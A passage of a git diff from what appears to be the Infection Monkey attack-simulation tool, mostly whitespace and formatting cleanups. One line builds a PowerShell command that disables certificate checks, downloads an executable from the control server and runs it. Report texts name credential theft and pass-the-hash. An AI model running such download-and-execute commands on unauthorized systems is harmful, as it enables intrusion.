"DEBUG", - "formatter": "simple", - "stream": "ext://sys.stdout" - }, - - "info_file_handler": { - "class": "logging.handlers.RotatingFileHandler", - "level": "INFO", - "formatter": "simple", - "filename": "info.log", - "maxBytes": 10485760, - "backupCount": 20, - "encoding": "utf8" - } - }, - - "root": { - "level": "DEBUG", - "handlers": ["console", "info_file_handler"] + "version": 1, + "disable_existing_loggers": false, + "formatters": { + "simple": { + "format": "%(asctime)s - %(filename)s:%(lineno)s - %(funcName)10s() - %(levelname)s - %(message)s" } + }, + "handlers": { + "console": { + "class": "logging.StreamHandler", + "level": "DEBUG", + "formatter": "simple", + "stream": "ext://sys.stdout" + }, + "info_file_handler": { + "class": "logging.handlers.RotatingFileHandler", + "level": "INFO", + "formatter": "simple", + "filename": "info.log", + "maxBytes": 10485760, + "backupCount": 20, + "encoding": "utf8" + } + }, + "root": { + "level": "DEBUG", + "handlers": [ + "console", + "info_file_handler" + ] + } } \ No newline at end of file diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py index c3c762dbc..17c537aeb 100644 --- a/monkey/monkey_island/cc/main.py +++ b/monkey/monkey_island/cc/main.py @@ -13,6 +13,7 @@ if BASE_PATH not in sys.path: from monkey_island.cc.island_logger import json_setup_logging from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH + # This is here in order to catch EVERYTHING, some functions are being called on imports the log init needs to be on top. json_setup_logging(default_path=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'island_logger_default_config.json'), default_level=logging.DEBUG) diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 324903809..8d0ed42ad 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -43,6 +43,7 @@ class Monkey(Document): tunnel = ReferenceField("self") command_control_channel = EmbeddedDocumentField(CommandControlChannel) aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS + # instance. See https://github.com/guardicore/monkey/issues/426. @staticmethod diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 3c10ca7d7..0d12f9785 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -188,4 +188,3 @@ class TestMonkey(IslandTestCase): cache_info_after_query = Monkey.is_monkey.storage.backend.cache_info() self.assertEqual(cache_info_after_query.hits, 2) - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index d61478641..c7190d0f1 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -14,6 +14,7 @@ class TestFinding(IslandTestCase): Also, the working directory needs to be the working directory from which you usually run the island so the server.json file is found and loaded. """ + def test_save_finding_validation(self): self.fail_if_not_testing_env() self.clean_finding_db() diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py index da7651f24..803fb5453 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_config.py +++ b/monkey/monkey_island/cc/resources/attack/attack_config.py @@ -27,4 +27,3 @@ class AttackConfiguration(flask_restful.Resource): AttackConfig.update_config({'properties': json.loads(request.data)}) AttackConfig.apply_to_monkey_config() return {} - diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py index 54a16f518..41f5fa417 100644 --- a/monkey/monkey_island/cc/resources/local_run.py +++ b/monkey/monkey_island/cc/resources/local_run.py @@ -16,6 +16,7 @@ from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH __author__ = 'Barak' import logging + logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/resources/monkey.py b/monkey/monkey_island/cc/resources/monkey.py index 8e523a8a7..3e3ef40c0 100644 --- a/monkey/monkey_island/cc/resources/monkey.py +++ b/monkey/monkey_island/cc/resources/monkey.py @@ -13,6 +13,7 @@ from monkey_island.cc.services.node import NodeService __author__ = 'Barak' + # TODO: separate logic from interface diff --git a/monkey/monkey_island/cc/resources/netmap.py b/monkey/monkey_island/cc/resources/netmap.py index ed83414f5..3b7e471d8 100644 --- a/monkey/monkey_island/cc/resources/netmap.py +++ b/monkey/monkey_island/cc/resources/netmap.py @@ -27,5 +27,3 @@ class NetMap(flask_restful.Resource): "nodes": monkeys + nodes + monkey_island, "edges": edges } - - diff --git a/monkey/monkey_island/cc/resources/pba_file_download.py b/monkey/monkey_island/cc/resources/pba_file_download.py index 5b567e8e4..de85fc291 100644 --- a/monkey/monkey_island/cc/resources/pba_file_download.py +++ b/monkey/monkey_island/cc/resources/pba_file_download.py @@ -9,6 +9,7 @@ class PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download user's PBA file """ + # Used by monkey. can't secure. def get(self, path): return send_from_directory(GET_FILE_DIR, path) diff --git a/monkey/monkey_island/cc/resources/pba_file_upload.py b/monkey/monkey_island/cc/resources/pba_file_upload.py index 0d924a742..3a636459c 100644 --- a/monkey/monkey_island/cc/resources/pba_file_upload.py +++ b/monkey/monkey_island/cc/resources/pba_file_upload.py @@ -21,6 +21,7 @@ class FileUpload(flask_restful.Resource): """ File upload endpoint used to exchange files with filepond component on the front-end """ + @jwt_required() def get(self, file_type): """ diff --git a/monkey/monkey_island/cc/resources/reporting/report.py b/monkey/monkey_island/cc/resources/reporting/report.py index 5b416e60b..961e745a8 100644 --- a/monkey/monkey_island/cc/resources/reporting/report.py +++ b/monkey/monkey_island/cc/resources/reporting/report.py @@ -1,6 +1,5 @@ import http.client - import flask_restful from flask import jsonify @@ -28,10 +27,10 @@ class Report(flask_restful.Resource): elif report_type == ZERO_TRUST_REPORT_TYPE: if report_data == REPORT_DATA_PILLARS: return jsonify({ - "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), - "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), - "grades": ZeroTrustService.get_pillars_grades() - } + "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(), + "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(), + "grades": ZeroTrustService.get_pillars_grades() + } ) elif report_data == REPORT_DATA_PRINCIPLES_STATUS: return jsonify(ZeroTrustService.get_principles_status()) diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py index 714c70ed2..c50394117 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -37,12 +37,12 @@ class TestJsonRepresentations(TestCase): # dicts and lists self.assertEqual({ - "a": [ - {"ba": obj_id_str, - "bb": obj_id_str} - ], - "b": {"id": obj_id_str} - }, + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, normalize_obj({ "a": [ {"ba": bson.objectid.ObjectId(obj_id_str), diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index a655c5f9f..8a8c750b4 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -22,8 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}})\ - + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ + \ telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py index e592e7214..ef4ff708d 100644 --- a/monkey/monkey_island/cc/resources/test/log_test.py +++ b/monkey/monkey_island/cc/resources/test/log_test.py @@ -2,7 +2,6 @@ from bson import json_util import flask_restful from flask import request - from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo, database diff --git a/monkey/monkey_island/cc/server_config.json b/monkey/monkey_island/cc/server_config.json index 0b28d0b74..420f1b303 100644 --- a/monkey/monkey_island/cc/server_config.json +++ b/monkey/monkey_island/cc/server_config.json @@ -1,4 +1,4 @@ { - "server_config": "standard", - "deployment": "develop" + "server_config": "standard", + "deployment": "develop" } diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 1c18f7654..10005bd26 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -10,7 +10,6 @@ from monkey_island.cc.services.reporting.report_generation_synchronisation impor __author__ = "VakarisZ" - LOG = logging.getLogger(__name__) TECHNIQUES = {'T1210': T1210.T1210, @@ -52,7 +51,7 @@ class AttackReportService: Generates new report based on telemetries, replaces old report in db with new one. :return: Report object """ - report =\ + report = \ { 'techniques': {}, 'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()}, diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py index 2b49f264d..8039a2e76 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1003(AttackTechnique): - tech_id = "T1003" unscanned_msg = "Monkey tried to obtain credentials from systems in the network but didn't find any or failed." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py index b84fe4a6f..2a39fad02 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1005(AttackTechnique): - tech_id = "T1005" unscanned_msg = "Monkey didn't gather any sensitive data from local system." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py index 43d7c42b0..9249020dc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1016(AttackTechnique): - tech_id = "T1016" unscanned_msg = "Monkey didn't gather network configurations." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py index a955f6cc9..3498029c9 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1018(AttackTechnique): - tech_id = "T1018" unscanned_msg = "Monkey didn't find any machines on the network." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py index d22583359..3fc29259b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py @@ -3,7 +3,6 @@ from monkey_island.cc.services.attack.technique_reports import AttackTechnique from common.utils.attack_utils import ScanStatus from monkey_island.cc.services.attack.technique_reports.technique_report_tools import parse_creds - __author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py index 1342b646e..ae3342355 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1041(AttackTechnique): - tech_id = "T1041" unscanned_msg = "Monkey didn't exfiltrate any info trough command and control channel." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py index ef15dd9fd..a2eb3ffd0 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1059(AttackTechnique): - tech_id = "T1059" unscanned_msg = "Monkey didn't exploit any machines to run commands at." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py index 7d8ceb93e..f8eb9aa3e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1065(AttackTechnique): - tech_id = "T1065" unscanned_msg = "" scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py index 623d157ae..655da767d 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1075(AttackTechnique): - tech_id = "T1075" unscanned_msg = "Monkey didn't try to use pass the hash attack." scanned_msg = "Monkey tried to use hashes while logging in but didn't succeed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py index bc2645bb9..726910789 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1082(AttackTechnique): - tech_id = "T1082" unscanned_msg = "Monkey didn't gather any system info on the network." scanned_msg = "" @@ -22,17 +21,17 @@ class T1082(AttackTechnique): {'$project': {'_id': 0, 'machine': 1, 'collections': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, - 'name': {'$literal': 'Amazon Web Services info'}}, - {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, - 'name': {'$literal': 'Running process list'}}, - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, - 'name': {'$literal': 'Network connections'}}, - {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, - 'name': {'$literal': 'SSH info'}}, - {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, - 'name': {'$literal': 'Azure info'}} - ]}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, + 'name': {'$literal': 'Amazon Web Services info'}}, + {'used': {'$and': [{'$ifNull': ['$process_list', False]}, {'$gt': ['$process_list', {}]}]}, + 'name': {'$literal': 'Running process list'}}, + {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, + 'name': {'$literal': 'Network connections'}}, + {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, + 'name': {'$literal': 'SSH info'}}, + {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, + 'name': {'$literal': 'Azure info'}} + ]}}, {'$group': {'_id': {'machine': '$machine', 'collections': '$collections'}}}, {"$replaceRoot": {"newRoot": "$_id"}}] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py index dd5d64d25..fe4b6ccec 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1086(AttackTechnique): - tech_id = "T1086" unscanned_msg = "Monkey didn't run powershell." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py index 7a6c830b8..f5702ede8 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1090(AttackTechnique): - tech_id = "T1090" unscanned_msg = "Monkey didn't use connection proxy." scanned_msg = "" @@ -20,5 +19,3 @@ class T1090(AttackTechnique): data = T1090.get_base_data_by_status(status) data.update({'proxies': monkeys}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py index 3d95fd88d..6ae8037bc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -5,7 +5,6 @@ __author__ = "VakarisZ" class T1105(AttackTechnique): - tech_id = "T1105" unscanned_msg = "Monkey didn't try to copy files to any systems." scanned_msg = "Monkey tried to copy files, but failed." diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py index 72bb0af76..a28dc5aeb 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py @@ -46,5 +46,3 @@ class T1110(AttackTechnique): data.update({'services': attempts}) return data - - diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py index 32187696a..3959302fa 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1188(AttackTechnique): - tech_id = "T1188" unscanned_msg = "Monkey didn't use multi-hop proxy." scanned_msg = "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py index eeae183f5..5b9a23c62 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py @@ -6,7 +6,6 @@ __author__ = "VakarisZ" class T1210(AttackTechnique): - tech_id = "T1210" unscanned_msg = "Monkey didn't scan any remote services. Maybe it didn't find any machines on the network?" scanned_msg = "Monkey scanned for remote services on the network, but couldn't exploit any of them." @@ -30,8 +29,8 @@ class T1210(AttackTechnique): @staticmethod def get_scanned_services(): results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'scan'}}, - {'$sort': {'data.service_count': -1}}, - {'$group': { + {'$sort': {'data.service_count': -1}}, + {'$group': { '_id': {'ip_addr': '$data.machine.ip_addr'}, 'machine': {'$first': '$data.machine'}, 'time': {'$first': '$timestamp'}}}]) diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 641da8055..41c218099 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -15,7 +15,6 @@ __author__ = "itay.mizeretz" logger = logging.getLogger(__name__) - # This should be used for config values of array type (array of strings only) ENCRYPTED_CONFIG_ARRAYS = \ [ @@ -266,11 +265,11 @@ class ConfigService: # Check if array of shh key pairs and then decrypt if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \ - ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + ConfigService.decrypt_ssh_key_pair(config_arr[i], True) else: config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i]) else: - parent_config_arr[config_arr_as_array[-1]] =\ + parent_config_arr[config_arr_as_array[-1]] = \ encryptor.dec(config_arr) if is_decrypt else encryptor.enc(config_arr) @staticmethod diff --git a/monkey/monkey_island/cc/services/database.py b/monkey/monkey_island/cc/services/database.py index 62e370e44..7062d71c3 100644 --- a/monkey/monkey_island/cc/services/database.py +++ b/monkey/monkey_island/cc/services/database.py @@ -6,7 +6,6 @@ from monkey_island.cc.services.post_breach_files import remove_PBA_files from flask import jsonify from monkey_island.cc.database import mongo - logger = logging.getLogger(__name__) @@ -28,4 +27,3 @@ class Database(object): def init_db(): if not mongo.db.collection_names(): Database.reset_db() - diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py index 77b28bdd4..be6aae12d 100644 --- a/monkey/monkey_island/cc/services/island_logs.py +++ b/monkey/monkey_island/cc/services/island_logs.py @@ -1,4 +1,5 @@ import logging + __author__ = "Maor.Rayzin" logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/mimikatz_utils.py b/monkey/monkey_island/cc/services/mimikatz_utils.py index 4b88473fe..e2ab8ec10 100644 --- a/monkey/monkey_island/cc/services/mimikatz_utils.py +++ b/monkey/monkey_island/cc/services/mimikatz_utils.py @@ -1,4 +1,3 @@ - __author__ = 'maor.rayzin' diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index c81e0bc4a..9627bf74c 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -130,7 +130,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index f0b6bdb6a..19293f991 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py index f64d4b4aa..903af1628 100644 --- a/monkey/monkey_island/cc/services/reporting/exporter_init.py +++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py @@ -4,6 +4,7 @@ from monkey_island.cc.services.reporting.report_exporter_manager import ReportEx from monkey_island.cc.services.reporting.aws_exporter import AWSExporter from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.environment.environment import env + logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/reporting/test_pth_report.py b/monkey/monkey_island/cc/services/reporting/test_pth_report.py index 7c709f862..b5a628fb1 100644 --- a/monkey/monkey_island/cc/services/reporting/test_pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/test_pth_report.py @@ -64,6 +64,3 @@ class TestPTHReportServiceGenerateMapNodes(IslandTestCase): self.assertEqual(map_nodes[0]["group"], "critical") self.assertEqual(len(map_nodes[0]["services"]), 2) self.assertEqual(map_nodes[0]["hostname"], hostname) - - - diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index a43da8416..98b99ac13 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -306,7 +306,7 @@ class TestZeroTrustService(IslandTestCase): def compare_lists_no_order(s, t): - t = list(t) # make a mutable copy + t = list(t) # make a mutable copy try: for elem in s: t.remove(elem) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index b0e2eb8b7..e6ac8734b 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -24,4 +24,3 @@ def process_post_breach_telemetry(telemetry_json): post_breach_action_name = telemetry_json["data"]["name"] if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS: POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json) - diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index b4efd3c3a..626a4cc52 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -9,7 +9,7 @@ from monkey_island.cc.models.zero_trust.segmentation_finding import Segmentation from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \ - "from `{src_seg}` segments to `{dst_seg}` segments." + "from `{src_seg}` segments to `{dst_seg}` segments." SEGMENTATION_VIOLATION_EVENT_TEXT = \ "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \ @@ -101,8 +101,8 @@ def get_segmentation_done_event(current_monkey, subnet_pair): return Event.create_event( title="Segmentation test done", message=SEGMENTATION_DONE_EVENT_TEXT.format( - hostname=current_monkey.hostname, - src_seg=subnet_pair[0], - dst_seg=subnet_pair[1]), + hostname=current_monkey.hostname, + src_seg=subnet_pair[0], + dst_seg=subnet_pair[1]), event_type=EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/version_update.py b/monkey/monkey_island/cc/services/version_update.py index 3d43017f6..c1dab52a9 100644 --- a/monkey/monkey_island/cc/services/version_update.py +++ b/monkey/monkey_island/cc/services/version_update.py @@ -54,4 +54,3 @@ class VersionUpdateService: @staticmethod def get_download_link(): return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % (env.get_deployment(), env.get_version()) - diff --git a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py index 2522b42dd..a802aabf1 100644 --- a/monkey/monkey_island/cc/services/wmi_handler.py +++ b/monkey/monkey_island/cc/services/wmi_handler.py @@ -5,7 +5,6 @@ __author__ = 'maor.rayzin' class WMIHandler(object): - ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544' def __init__(self, monkey_id, wmi_info, user_secrets): @@ -160,4 +159,3 @@ class WMIHandler(object): {'type': USERTYPE, 